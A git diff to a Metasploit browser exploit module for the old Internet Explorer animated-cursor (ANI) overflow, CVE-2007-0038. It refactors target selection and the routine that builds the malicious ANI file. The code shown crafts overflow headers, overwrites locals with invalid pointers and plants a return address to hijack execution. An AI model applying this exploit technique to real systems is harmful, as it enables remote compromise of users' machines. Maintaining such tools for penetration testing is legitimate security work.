diff --git a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
index 5fab17cb12..5050262024 100644
--- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
+++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
@@ -146,6 +146,9 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
mytargs = (target.name =~ /All Targets/) ? targets : [target]
mytargs.each_index do |i|
+
+ next if not mytargs[i].ret
+
html << "
'application/octet-stream' })
+ send_response(cli, generate_ani(p, target), { 'Content-Type' => 'application/octet-stream' })
handler(cli)
end
- def generate_ani(payload)
+ def generate_ani(payload, target)
# Build the first ANI header
anih_a = [
@@ -201,8 +206,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
anih_b = nil
- case target.name
- when /Vista/
+ if (target.name =~ /Vista/)
# Vista has ebp=80, eip=84
anih_b = anih_a + rand_text(84-anih_a.length)
@@ -215,7 +219,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# Overwrite locals with invalid pointers
anih_b[64, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3
end
-
+
# Overwrite the return with address of a "call ptr [ebx+4]"
anih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4]